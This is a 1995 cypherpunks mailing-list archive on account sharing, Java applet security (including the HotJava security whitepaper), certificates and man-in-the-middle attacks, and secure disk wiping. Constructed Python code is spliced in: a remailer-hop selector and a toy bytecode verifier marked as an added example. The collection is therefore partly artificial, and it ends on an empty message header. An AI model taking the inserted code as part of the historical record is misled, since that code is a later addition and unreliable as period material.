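CONFIG_RE = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";\s*$')
# The history column may contain spaces, so anchor on name/address from the
# left and latency/uptime from the right, and let history float in between.
STATS_RE = re.compile(
    r'^(\S+)\s+(\S+@\S+)\s(.*?)\s+((?:\d+:)?\d+:\d+)\s+(\d+\.\d+)%\s*$')


@dataclass
class Remailer:
    name: str
    address: str
    caps: set = field(default_factory=set)
    pgp_key_id: Optional[str] = None   # what to encrypt to, per the "pgp." rule
    latency_s: Optional[int] = None
    uptime: Optional[float] = None


def to_seconds(latency):
    """Convert '4:12' or '8:14:14' to seconds (assumed [h:]mm:ss)."""
    total = 0
    for part in latency.split(":"):
        total = total * 60 + int(part)
    return total


def parse_listing(text):
    remailers = {}
    for line in text.splitlines():
        m = CONFIG_RE.match(line)
        if m:
            r = Remailer(m.group(1), m.group(2))
            for cap in m.group(3).split():
                if cap == "pgp.":
                    # Trailing period: use the short name as the key ID.
                    r.caps.add("pgp")
                    r.pgp_key_id = r.name
                else:
                    r.caps.add(cap)
            if "pgp" in r.caps and r.pgp_key_id is None:
                r.pgp_key_id = r.address
            remailers[r.name] = r
            continue
        m = STATS_RE.match(line)
        if m:
            r = remailers.get(m.group(1))
            # Only accept a stats row whose address agrees with the config line.
            if r is not None and r.address == m.group(2):
                r.latency_s = to_seconds(m.group(4))
                r.uptime = float(m.group(5))
    return remailers


def select_hops(remailers, require=("cpunk", "pgp"),
                reject=("mon", "filter"), min_uptime=99.0):
    """Names of remailers that have every required keyword, none of the
    rejected ones, and measured uptime >= min_uptime; most reliable first."""
    ok = [r for r in remailers.values()
          if r.uptime is not None and r.uptime >= min_uptime
          and set(require) <= r.caps and not (set(reject) & r.caps)]
    ok.sort(key=lambda r: (-r.uptime, r.latency_s))
    return [r.name for r in ok]


if __name__ == "__main__":
    listing = parse_listing(SAMPLE)
    for name in select_hops(listing):
        r = listing[name]
        print(f"{name:8} key={r.pgp_key_id} latency={r.latency_s}s uptime={r.uptime}%")
```
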




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 9 Oct 95 04:18:49 PDT
To: cypherpunks@toad.com
Subject: Re: LACC: Account sharing leads to false imprisonment
In-Reply-To: <199510090843.SAA29314@suburbia.net>
Message-ID: <9510091116.AA15078@all.net>
MIME-Version: 1.0
Content-Type: text


Thought you might like another perspective:

...
>                             A GORRIE STORY
> 
> Here's the background: in October of 1994, Hirsh's stepbrother, a U of
> T grad student, said Hirsh could use his school-provided net account.

Almost certainly unauthorized use.  The use of another person's account
is almost always against school policy, and hence is likely to be a
violation of the law.

> Hirsh used it to read news. He thought the net fascinating so began
> uploading copies of The Anarchives. Hirsh never tried to hide who he
> was -- he even included his home phone number, which is how the Super-
> Sleuth Sysadmins "found" him. Hirsh made similar use of an account
> belonging to "Ms X" -- a female Ph.D. student and friend of Stepbro's.

Ignorance of the law is no excuse, and being easy to catch doesn't make
you innocent of a crime.

> This would have been a happy and otherwise normal arrangement except
> that in January, 1995, U of T engineering prof Jack Gorrie
> (gorrie@ecf.utoronto.ca), bossman of U of T's engineering computing
> facility computer, received a complaint from someone at the University
> of British Columbia about The Anarchives being posted to net news. The
> person wanted it stopped.

Interstate transport of stolen (presumably copyrighted) property, possible
violation of national laws of both nations.  Unauthorized use of the
computers at the University of British Columbia.

> Gorrie came to notice Ms X wasn't signing these documents, a Jesse
> Hirsch was. He also noticed Hirsh and another U of T student (the
> stepbro) exchanged email about the accounts. As Hirsh and his stepbro
> have different last names, Gorrie concluded a larger hacker conspiracy
> was afoot.

Reasonable assumption.  The only way to find out different would be to
violate the users' privacy by reading their mail, etc.

> Gorrie launched into his Canadian rendition of Cliff Stoll, author of
> compu-crime-thriller _The Cuckoo's Egg_ -- in Gorrie's case, _The
> Loonie's Egg_. He "tracked" Hirsh for two months, recording every
> keystroke -- even though he had all three students' phone numbers.

Collected possible evidence.  A good idea.  Alerting potential criminals
is a poor way to catch them and potentially dangerous.  May not stand up
in court as it is hearsay - not exempt under the normal business record
exception.

> On March 8, 1995, he asked the cops to intervene. "I checked and found
> that the account was indeed being used to broadcast information on
> behalf of The Anarchist Organization," he wrote Detective Hugh
> Ferguson.

Sounds wise.

> Thus it came to be that Jesse Hirsh was forced to model nude for
> Toronto's finest, with the blessing of U of T.

If he turned out to be a terrorist who was planning to blow up a
building, you would have called this a tremendous piece of police work,
they could have written a million-selling book, and you would hail the
sysadmin as a computer age hero.

> Stepbro got his own taste of U of T six-gun justice. Off in a
> Washington, D.C., engineering lab, he came under FBI investigation.
> Naturally, the FBI found nothing wrong because there was nothing wrong
> -- except for an over-zealous sysadmin using a meat cleaver to scratch
> an itch.

Try again.  I assume that they found this was not a "real" terrorist. 
But to call it over-zealous is not right.  S/he was doing the job and
should be commended for trying to do it as well as s/he could.

>                            CHARGES DROPPED
> 
> On Sept. 7, minutes before the case was to go to court, the
> prosecution dropped all charges. Hirsh agreed to pay a token
> settlement of $400 for four months of university computer use. U of T
> first claimed it was owed $1,560. Hirsh places the real cost at $60.

So Hirsh agreed that he had been illegally using the computer system
and the case was settled with a monetary fine.

> Hirsh devoted an issue of The Anarchives to the case. It spread around
> cyberspace. In it, Hirsh includes Gorrie's email address and asks
> people to send him their opinions. Quite a few did. They were rather
> unpleasant. Gorrie, miffed, used the U of T pipeline to have the
> stepbro make Hirsh shut up.

So what's fair for Hirsh is not fair for the Sysadmin? Sounds to me like
you think it's OK for Hirsh to have people write nasty letters to the
admin but not OK for the admin to respond via the step-brother.

> After subjecting Hirsh to complete and devastating public humiliation,
> U of T was now pleading for discretion.

After Hirsh broke the law, he is trying to get even for being caught by
harassing the people who caught him.

...

> Hirsh wrote Gorrie privately, saying he was sorry Gorrie was getting nasty
> mail. Gorrie replied the whole affair was a "big misunderstanding." As
> they were _both_ misled, they were _both_ victims: Victim Hirsh was
> dragged down the street in handcuffs, fingerprinted, mugshotted,
> strip-searched and jailed for hours; Victim Gorrie received email that was
> mean to him.

Hirsh realized he was wrong to harass Gorrie and apologized for creating
the situation.  Gorrie gracefully called it a "big misunderstanding" and
accepted the abuse as part of doing a tough job.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 9 Oct 95 04:52:00 PDT
To: cypherpunks@toad.com
Subject: GOB_ble
Message-ID: <199510091151.HAA05403@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-9-95. NYPaper:


   "Is the top priority in computing shifting from speed to
   how easily you can interact? How fast will the
   Microsoft-Intel duopoly fade?" Denise Caruso's column

      When the Internet's original creators decided to publish
      their networking standards so that any computer could
      connect to the network, they certainly had no idea that
      almost 30 years later, their decision would provide the
      first real lever to pry the Microsoft-Intel duopoly from
      its leadership role. But this very prospect is why one
      well-known technology investor made a speech last week
      called, "Why Microsoft and Intel Don't Matter Anymore."


   "Haves and Have-Nots Revisited. Rich Nations Talk
   High-Tech, but the Poor Live No-Tech."

      Digital technology is revolutionizing telecommunications
      and erasing the boundaries that separate the telephone,
      computer and media industries. But the revolution's
      inequality takes the shine off a business that has
      celebrated itself as both a one-stop shop for the
      Information Age and a force for positive political
      change in the world. "The present reality is that the
      technology gap between developed and developing nations
      is actually widening," said Nelson Mandela, who spoke at
      Telecomm 95's opening.


   "A software gift service, by lawsuit and negotiation, tries
   to demonstrate that it takes its claim seriously." Sandra
   Chartrand's Patents column.

      One controversy is a patent issued in 1985 for selling
      software to individuals through the Internet and some
      CD-ROM's. Its owner, Interactive Gift Express Inc. says
      the patent covers the selling and downloading of digital
      information. There are those who disagree. "I've read
      the patent and can actually say that there is no
      invention there at all," said Richard Stallman at MIT.


   Trio: GOB_ble  (16 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 9 Oct 95 08:17:51 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: The problem with Java
In-Reply-To: <9510091042.AA13473@all.net>
Message-ID: <Pine.SOL.3.91.951009081514.13505B-200000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain

I'm not sure how many people here have read the paper on java security 
that is included with the distribution - I'm including the html source at 
the end of the message. That gives some more information on what Sun does 
and does not claim. That makes it easier to verify whether or not those 
claims are correct, and whether they are sufficient for whatever level of 
security.

The document can also be found at 

http://www.javasoft.com/1.0alpha3/doc/security/security.html

Simon


<HTML>

<HEAD>

<TITLE>HotJava: The Security Story</TITLE>

</HEAD>

<BODY>

 <P>

<A NAME=HEADING1></A>

<H1><img src=Boxer.gif align=middle> HotJava(tm): The Security Story</H1>

<HR>

HotJava(tm)  is a world wide web (WWW) browser, built using a new language called Java. Perhaps the most significant new facility that HotJava implements is the ability to import code fragments across the net and execute them. One of the most important technical challenges in building a system like HotJava is to make it safe. Importing code fragments across the network, installing, and running them is an open invitation to security problems. <P>

The question of how to provide a secure environment for code to execute in doesn't have a single answer. HotJava has layers of interlocking facilities that provide defenses against a variety of attacks. These layers are:<P>

<UL>

<LI>The Java(tm) language, which was designed to be a safe language and the Java compiler which ensures that source code doesn't violate the safety rules.<P>

<LI>A verification of the byte codes imported into the runtime to ensure that they obey the language's safety rules. This layer guards against an altered compiler producing code that violates the safety rules.<P>

<LI>A class loader which ensures that classes don't violate name space or access restrictions when they are loaded.<P>

<LI>Interface-specific security that prevents applets from doing destructive things. It depends on the security guarantees of the previous layers. This layer depends on the integrity guarantees from the other three layers.<P>

</UL>

<A NAME=HEADING2></A>

<HR>

<H2>Security layer one: the language and compiler</H2>

The Java language and the compiler comprise the first line of security for HotJava. Java was designed to be a safe language. <P>

Initially, the development team thought that by adding safety features to an existing language such as C++, the safety goals could be achieved. However, as work progressed it became clear that this strategy would not succeed without putting some restrictions on C++. <P>

C++ has a series of facilities to control access to objects, but it also has ways to forge access to objects and to sub-parts of objects that defeat the access controls. The C++ facilities that allow forging have either been eliminated in Java or changed to make them safe. Most importantly, you can't do pointer arithmetic; in fact you can't modify pointers in any way. However, Java has true arrays instead of pointer arithmetic. And because the primary use of pointer arithmetic in C and C++ is to access arrays, programmers often don't notice the change. Another example is the "cast" operator: the Java compiler checks that a cast is legal, whereas C and C++ do not. <P>

<A NAME=HEADING3></A>

<HR>

<H2>Security layer two: verifying the bytecodes</H2>

A trustworthy compiler ensures that Java source code doesn't violate the safety rules, but someone could alter the compiler to produce code that violates them. HotJava, which can import code fragments from anywhere, doesn't know whether a code fragment comes from a trustworthy compiler or not. So, before executing any code fragment, the runtime system subjects it to a series of tests.<P>

The tests range from verification that the format of the fragment is correct, to passing it through a simple theorem prover to establish that the code plays by the rules. The code is checked to ensure: <P>

<UL>

<LI>that it doesn't forge pointers<P>

<LI>that it doesn't violate access restrictions<P>

<LI>that it accesses objects as what they are. (For example, the tests ensure that "InputStream" objects are always used as "InputStreams" and never as anything else.)<P>

<LI>that it calls methods with appropriate arguments of the appropriate type<P>

<LI>that there are no stack overflows<P>

</UL>

The representation of code fragments loaded into the runtime is a byte coded machine-independent instruction set that bears a resemblance to representations like the UCSD Pascal P-Codes[Bowles78], i.e., it is stack based. <P>

Consider the following Java code sample: <P>

<PRE>

class vector {

    int arr[];

    int sum() {

        int la[] = arr;

        int S = 0;

        for (int i=la.length; --i&gt;=0;)

            S += la[i];

        return S;

    }

}

</PRE>

The byte codes generated when the above code is compiled look like the following:<BR><IMG SRC="security-whitepaper_Tbl_10.gif"><BR>

<P>

<A NAME=HEADING4></A>

<HR>

<H2>Type information</H2>

Java bytecodes contain more type information than is strictly necessary for the interpreter. For example, both the aload and iload opcodes have identical implementations; however, aload is used to load a pointer and iload is used to load an integer. Similarly, the getfield opcode has a symbol table reference; the symbol table has type information. This "extra" type information allows the runtime system to perform checks that guarantee that type information isn't being illegally manipulated. <P>

Most stack based instruction sets don't limit what you can do with the stack and local variables. Conceptually, at any point in the program each slot in the stack and each local variable has a type. This collection of type information, i.e., all the slots and local variables, is called the type state of the execution frame. An important property of the type state is that this type can be determined statically by induction, i.e., before any program code is executed. As the runtime system reads through a block of instructions, each instruction pops and pushes values of particular types. Instruction definitions are required to have the following inductive property:<P>

<BLOCKQUOTE>

<I>Given only the type state before the execution of the instruction, the type state afterwards is determined.</I><P>

</BLOCKQUOTE>

Given a straight-line block of code, i.e., no branches, and starting with a known stack state, the type state of each slot in the stack is known. For example:<P>

<PRE>

	iload_1	Load integer variable, stack type state=I

	iconst 5	Load integer constant, stack type state=II

	iadd	Add two integers producing an integer, stack type state=I

</PRE>

A number of stack-based instruction sets, like Smalltalk [Adobe85] do not have this property. For example, the definition of the PostScript add operator explicitly states "If both operands are integers and the result is within integer range, the result is an integer, otherwise the result is a real." In many situations this dynamic type behavior is considered to be an advantage, but HotJava needs to provide a secure execution environment and it must know the types of objects in order to guarantee a certain level of security. <P>

In conjunction with the inductive property above we require that:<P>

<BLOCKQUOTE>

<I>When there are two execution paths into the same point, they must arrive there with exactly the same type state.</I><P>

</BLOCKQUOTE>

This requirement has several implications. For example, compilers cannot write loops that iterate through arrays, loading each element of the array onto the stack, effectively copying the array onto the stack. This behavior is prevented because the flow path into the top of the loop will have a different type state than the branch back to the top. Because all paths to a point are required to arrive with the same type state, the type state from any incoming path can be used to do further manipulations.<P>

Code is checked for compliance with these rules by a part of the loader called the verifier. It traverses the byte codes, constructs the type state information, and verifies the types of the parameters to all the opcodes. The following illustration shows the flow of code from Java source code to execution by the runtime system.<BR><IMG SRC="security-whitepaper_AFrame_4.gif"><BR>

<P>

The verifier acts as a gatekeeper by preventing the execution of imported code until it has passed the verifier's tests. When code verification is complete a number of important properties of the code are known:<P>

<UL>

<LI>The code causes no operand stack overflows or underflows.<P>

<LI>The types of the parameters to all opcodes are known to always be correct.<P>

<LI>No illegal data conversions are done, like converting integers to pointers.<P>

<LI>Object field accesses are known to be legal (i.e., the verifier checks that the rules for public, private, and protected accesses are obeyed).<P>

</UL>

Knowing these properties makes the runtime system much faster because it doesn't have to check anything. There are no operand type checks and no stack overflow checks. The runtime can eliminate these checks without compromising safety.<P>

These properties also provide a foundation for the security of the system:<P>

<UL>

<LI>pointers can be treated essentially as capabilities <P>

<LI>applications cannot forge pointers, e.g., casting an integer to a pointer<P>

<LI>applications cannot get around pointers<P>

<LI>all the access restrictions are enforced <P>

</UL>

So, in HotJava, you can trust that a private variable really is private, that no piece of application code is doing some magic with casts to extract information from a private variable, for example, a credit card number from the billing software. This means that implementing security for HotJava against destructive applets is easier to do. HotJava security has to deal with restricting file access and the ability of applets to grab files and throw them over firewalls. The HotJava security implementation doesn't have to worry about threats like hacked bytecodes forging access to private methods or overflowing the stack.<P>

<A NAME=HEADING5></A>

<HR>

<H2>Security level three: the class loader</H2>

After the initial runtime environment checks are passed, code encounters a class loader. The environment seen by a thread of execution running Java byte codes can be visualized as a set of classes partitioned into namespaces. The class loader guarantees that a unique namespace exists for classes that come from the local file system (called built-ins), and a unique namespace exists for each network source. When HotJava imports a class across the network the Class Loader places it into the private namespace associated with its origin. Thus, classes imported from different places are partitioned from each other.<P>

When a class references another class, the runtime system first looks for it in the namespace of the built-ins, then in the namespace of the referencing class. There is no way that an imported class can "spoof" a built-in class. Built-ins can never accidentally reference classes in imported namespaces, they can only do it explicitly. Spoofing is prevented because the system always checks built-in classes first.<P>

<A NAME=HEADING6></A>

<HR>

<H2>Security level four: protecting the file system and network access</H2>

HotJava enforces security policies confident that its security interfaces are secure. The three lower levels of security guarantee that all local classes, e.g., the file access primitives, are themselves protected from being supplanted, replaced, or extended by imported code. <P>

The file access primitives implement an access control list that controls read and write access to files by imported code (or code invoked by imported code). The defaults for these access control lists are very restrictive. If an attempt is made by a piece of imported code to access a file to which access has not been granted, a dialog box pops up to allow the user to decide whether or not to allow that specific access. These security policies err on the conservative side in order to ensure maximum security. This conservative approach may make writing some applets more difficult or awkward.  <P>

For network security, HotJava provides a variety of mechanisms that can provide information about the trustworthiness of imported code. These mechanisms cover a wide range of possibilities. At the simple end the system can check on the origin of a code fragment to determine if it came from inside or outside a firewall. At the sophisticated end of the range a mechanism exists whereby public keys and cryptographic message digests can be securely attached to code fragments that not only identify who originated the code, but guarantee its integrity as well. This latter mechanism will be implemented in future releases.<P>

The security policies implemented by the runtime system can be dynamically adjusted based on the information available concerning the origin of a code fragment. The Socket class provides such an example. <P>

The Socket class implements security policies that are adjusted to reflect the trustworthiness of the code that invoked it, and transitively, the code that invoked the invoker. The information about what code began the chain of execution is available to the class in the form of which namespace contains the invoking code and what parameters are associated with that class. The class loader puts the classes it has loaded in a specific namespace, allowing the Socket class to determine the network host from which a class is loaded. <P>

Knowing the network host allows the HotJava security mechanism to determine whether the class originated inside or outside a firewall. Knowledgeable users of HotJava can decide which category of hosts to trust when loading executable code. For example, the Socket class can implement the policy of only allowing new connections to be created that terminate at the host from whence the code was loaded. This restriction means that code loaded from outside a firewall cannot connect to other machines on the net behind the firewall. Code that comes from more trusted sources can be allowed more freedom to make connections to other machines. As an additional defense against untrusted sources HotJava's security can be set to prevent any code from being loaded. The level of security is configurable by HotJava users.<P>

<A NAME=HEADING7></A>

<HR>

<H2>Summary</H2>

The security in HotJava provides a safe environment for the execution of imported code. The security is based on interlocking layers of security that range from the design of the Java language at the base to the file and network access protections at the top. In the future HotJava will support network commerce through the inclusion of public key encryption technology.<P>

<A NAME=HEADING8></A>

<HR>

<H2>Bibliography</H2>

<DL>

<DT><A NAME=1>[Adobe85]

<dd>Adobe Systems Incorporated, "PostScript Language Reference Manual", Addison Wesley.

<DT><A NAME=2>[Aho86]

<dd>Aho, Alfred V., Ravi Sethi, Jeffrey D. Ullman, "Compilers: Principles, Techniques and Tools", Addison Wesley.

<DT><A NAME=3>[Bowles78]

<dd>Bowles, Kenneth L, "UCSD Pascal", Byte. 46 (May)

<DT><A NAME=4>[Chambers92]

<dd>Chambers, Craig, David Ungar, and Elgin Lee. An Efficient Implementation of Self, a Dynamically-Typed Object-Oriented Language Based on Prototypes. In OOPSLA `89 Conference Proceedings, p. 49-70, New Orleans, LA, October 1989. Published as SIGPLAN Notices 24(10), October 1989. Also published in Lisp and Symbolic Computation 4(3), Kluwer Academic Publishers, June 1991.

<DT><A NAME=5>[Duetsch84]

<dd>Deutsch, L. Peter and Alan Schiffman, "Efficient Implementation of the Smalltalk-80 System." Proceedings of the 11th Symposium on the Principles of Programming Languages, Salt Lake City, UT, 1984

<DT>[Goldberg83]

<dd>Goldberg, Adele and David Robson, "Smalltalk-80: The Language and its Implementation", Addison Wesley.

</DL>

</BODY>

</HTML>
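
The type-state rules in the HotJava paper attached above (each instruction's effect on the type state is fixed, and every path into a point must arrive with the same type state) can be exercised on a toy instruction set. This is an added example in Python, not Sun's verifier and not part of the original message; only iload, aload, iconst and iadd are named in the paper, and the other opcodes, the tuple encoding and the sample programs are assumptions constructed for illustration.

```python
# Toy type-state verifier for a stack machine (added example, not Sun's verifier).
# Types: "I" integer, "A" reference, "?" uninitialised local. The opcodes iload,
# aload, iconst and iadd are named in the paper; the rest are assumed, JVM-style.

class VerifyError(Exception):
    pass

# opcode -> (types popped, types pushed); rightmost character = top of stack
EFFECT = {"iconst": ("", "I"), "iadd": ("II", "I"), "arraylength": ("A", "I"),
          "iaload": ("AI", "I"), "ireturn": ("I", ""), "iflt": ("I", ""),
          "goto": ("", "")}
LOAD = {"iload": "I", "aload": "A"}      # local -> stack, local's type must match
STORE = {"istore": "I", "astore": "A"}   # stack -> local, retypes the local


def step(state, op, arg, max_stack):
    """Inductive property: the state after an instruction follows from the state before."""
    stack, local = state
    if op in LOAD or op in STORE:
        if not 0 <= arg < len(local):
            raise VerifyError(f"{op} {arg}: no such local variable")
        if op in LOAD and local[arg] != LOAD[op]:
            raise VerifyError(f"{op} {arg}: local holds {local[arg]}, not {LOAD[op]}")
        pops, pushes = (STORE[op], "") if op in STORE else ("", LOAD[op])
    elif op in EFFECT:
        pops, pushes = EFFECT[op]
    else:
        raise VerifyError(f"unknown opcode {op}")
    if len(stack) < len(pops):
        raise VerifyError(f"{op}: operand stack underflow")
    if not stack.endswith(pops):
        raise VerifyError(f"{op}: expects {pops} on stack, found {stack}")
    stack = stack[:len(stack) - len(pops)] + pushes
    if len(stack) > max_stack:
        raise VerifyError(f"{op}: operand stack overflow")
    if op in STORE:
        local = local[:arg] + STORE[op] + local[arg + 1:]
    return stack, local


def verify(code, local_types, max_stack=4):
    """Return the type state on entry to each instruction, or raise VerifyError."""
    before = [None] * len(code)
    work = [(0, ("", local_types))]
    while work:
        pc, state = work.pop()
        if not 0 <= pc < len(code):
            raise VerifyError(f"control reaches {pc}, outside the code")
        if before[pc] is not None:
            # Second path into this point: it must carry exactly the same type state.
            if before[pc] != state:
                raise VerifyError(
                    f"pc {pc}: paths arrive with type states {before[pc]} and {state}")
            continue
        before[pc] = state
        op, arg = code[pc]
        after = step(state, op, arg, max_stack)
        if op == "ireturn":
            continue
        if op in ("goto", "iflt"):
            work.append((arg, after))       # branch target
        if op != "goto":
            work.append((pc + 1, after))    # fall-through
    return before


def check(code, local_types):
    """Return 'ok' or the reason the code is rejected."""
    try:
        verify(code, local_types)
        return "ok"
    except VerifyError as err:
        return str(err)


# Constructed programs. The paper's straight-line fragment, plus a return:
STRAIGHT_LINE = [("iload", 1), ("iconst", 5), ("iadd", None), ("ireturn", None)]

# sum() from the paper, with arr passed in local 0 instead of read through
# getfield (locals: 0=arr, 1=la, 2=S, 3=i). Loop head is pc 7.
SUM_LOOP = [
    ("aload", 0), ("astore", 1), ("iconst", 0), ("istore", 2),     # 0-3   la=arr; S=0
    ("aload", 1), ("arraylength", None), ("istore", 3),            # 4-6   i=la.length
    ("iload", 3), ("iconst", -1), ("iadd", None), ("istore", 3),   # 7-10  --i
    ("iload", 3), ("iflt", 20),                                    # 11-12 exit if i<0
    ("iload", 2), ("aload", 1), ("iload", 3), ("iaload", None),    # 13-16 S, la[i]
    ("iadd", None), ("istore", 2), ("goto", 7),                    # 17-19 S += la[i]
    ("iload", 2), ("ireturn", None),                               # 20-21 return S
]

# A loop that leaves each element on the stack (locals: 0=arr, 1=i); the back
# edge reaches pc 3 with one more "I" on the stack than the first entry did.
STACK_COPY_LOOP = [
    ("aload", 0), ("arraylength", None), ("istore", 1),            # 0-2
    ("iload", 1), ("iconst", -1), ("iadd", None), ("istore", 1),   # 3-6   --i
    ("iload", 1), ("iflt", 13),                                    # 7-8
    ("aload", 0), ("iload", 1), ("iaload", None), ("goto", 3),     # 9-12
    ("iconst", 0), ("ireturn", None),                              # 13-14
]

# An integer stored in a local and then loaded as if it were a reference.
FORGED_POINTER = [("iconst", 4096), ("istore", 1), ("aload", 1),
                  ("arraylength", None), ("ireturn", None)]

if __name__ == "__main__":
    for name, code, local_types in [("sum loop", SUM_LOOP, "A???"),
                                    ("stack copy loop", STACK_COPY_LOOP, "A?"),
                                    ("forged pointer", FORGED_POINTER, "A?")]:
        print(f"{name}: {check(code, local_types)}")
```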




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Lewton <clewton@netcom.com>
Date: Mon, 9 Oct 95 08:23:45 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: PC disk wipe software
In-Reply-To: <199510091318.JAA24166@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951009082105.18953G-100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Oct 1995, Perry E. Metzger wrote:

> 
> wipe a bunch of data from an MS-DOS hard drive, so that it can't be
> recovered. Are there any readily available utilities for this? Will
> 
> Perry
> 
PCTools has such a utility.  Claims DoD specs.

Chuck




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 9 Oct 95 08:55:40 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
In-Reply-To: <Pine.SUN.3.91.951008185136.29595B-100000@rwd.goucher.edu>
Message-ID: <199510091554.IAA20941@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Jon Lasser <jlasser@rwd.goucher.edu> writes:
>I think Hal and some other Cypherpunks (Me, You, Carl, etc.) are not 
>proceeding from one of the same assumptions.  Specifically, Hal seems to 
>be proceeding from the assumption that the person "on the other end of 
>the line" is in fact a known physical entity who has a meat reputation 
>tied to the name.  I'm proceeding from the assumption that the person on 
>the other end of the line has no specific RL reputation that I'm basing 
>the relationship on, just the online one.

>Here's an example:
>There's someone on the list, now, apparently, with the name of "Steven 
>Levy."  Hal assumes that, when communicating with that "Steven Levy," one 
>intends to communicate with the fairly-well-known journalist of that 
>name, and thus  certification of RL identity is important.  I assume 
>that, unless there's a specific reason otherwise, I want to have an 
>intellectual conversation (or financial transaction, etc) that isn't 
>predicated on this being "the" Steven Levy.  In that case, certification 
>of RL identity is irrelevant.

That is not exactly my point.  My concern is avoiding the man in the
middle attack.  One way to do that is to find a certificate from Verisign
saying that this key belongs to Steven Levy, ideally with other
information that I can confirm relates to the on-line personage I wish to
speak to.  Presumably the MITM can't get a certificate for Steven Levy,
unless by coincidence his name actually is Steven Levy, in which case the
other information I mentioned will be helpful as well.

Would you propose just to use an unsigned key that says it is for
Steven Levy?  Or perhaps a key without any name at all that someone
told you was for him?  That is the policy which I have been arguing
against.  The whole idea of communicating with keys, or not having key
certificates or signatures, seems to me to leave open the possibility
of man in the middle attacks.  Isn't this a problem?  Or are the
difficulties of mounting a MITM attack considered so large that they can be
neglected?  I would just like to hear exactly what are the assumptions
being made regarding this problem by those who oppose certificates.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 9 Oct 95 08:58:54 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
Message-ID: <199510091558.IAA05131@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:04 AM 10/9/95 EDT, Carl Ellison <cme@TIS.COM> wrote:
>>I don't understand this whole discussion.  A certificate is a signed
>>binding of a key and a unique name, right?
>It depends on how you define certificate.  If you define it this way, then
>I'm proposing the elimination of certificates (because I'm eliminating the
>unique name as something different from a key).
>
>If you define certificate as I do -- as a bound statement of some attribute
>of a key, then it should become clearer.  It's just that the attribute I'm
>binding is not some unique person-name -- rather something like permission
>to spend money from a bank account.

This doesn't necessarily eliminate certificates - while you have a signed
statement from Alice's key that she uses Bank Account X, and a signed statement
from Alice's key authorizing transfer of $D from Bank Account X to Bank
Account Y, the Bank, or a customer, may refuse to accept the request unless
there's a signed statement from the Bank's key that Alice's key uses Account X.
None of these need Alice's name, or for that matter the Bank's, as long as
there's also a signed attribute statement from the Bank's key that it's a
bank, etc.  The meaning of the certificates changes a bit, but there's still
a certificate from the bank binding Alice's Key to Alice's Bank Account.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 06:18:29 PDT
To: cypherpunks@toad.com
Subject: PC disk wipe software
Message-ID: <199510091318.JAA24166@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I thought I'd ask here, since it's related to a lot of the stuff people
have written for the PC platform in these parts. I need to securely
wipe a bunch of data from an MS-DOS hard drive, so that it can't be
recovered. Are there any readily available utilities for this? Will
any of them selectively erase only data that isn't allocated to
existing files?

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
Date: Mon, 9 Oct 95 10:11:17 PDT
To: perry@piermont.com
Subject: java security concerns
Message-ID: <9510091642.AA28211@pepper.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain



Perry pointed out the standard set of concerns that anyone should have with
Java. About the only thing I'd care to dispute at the moment is that Java
is a "large complicated" application. It is in fact less than 20K lines of
C code. And while it is true that applications of even this size are
difficult to prove safe, there has been an effort to break that problem
up into components such that each "layer" can be proven safe and where
that layer is used that safety carries over. Let me give you an example:

There are three "parts" of the Java system:
	o Java Bytecode
	o Java Runtime
	o Java Virtual Machine.

At a "meta" level there is the Java Language and the compiler that converts
it into byte codes; however, for the purposes of a security discussion those
are irrelevant, since the browser in this case receives byte codes and the
compiler at the other end is presumed suspect.

So one way to approach this analysis is to look first at the bytecodes. One
of the things you will discover is that Java is *not* a general purpose 
language. It lacks crucial features such as introspection and anonymous
memory access. So you might ask "How can anyone write anything useful in it
then?" and that is a fair question. The answer is that it does have one
loophole and that loophole is the 'native' keyword on a method description.
Basically, if you need a general purpose feature (like object inspection)
you can get it with a native method. "So I write a native method to delete
your files, what does that buy me?" you might ask. Well Java is also a 
_late binding_ language. Thus the binding of external method references
(which native methods are by definition one) can be identified at bind/link
time (which always occurs on the client) and optionally rejected.

The next level of inspection is all of the classes that, through one of their
methods, actually call a native method. Those can be analyzed closely and
there are relatively few of them (about 28).

The final level of inspection is the virtual machine interpreter. Its 
operation as a giant switch statement can be inspected for valid code
design. It isn't all that large and a team of three can inspect it in under
a week. 

If the layers work, the system works. We encourage any questions on security
or identifying any "holes" to be sent to java@java.sun.com for our immediate
attention.

--Chuck



However, Java is also late




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 9 Oct 95 09:47:24 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
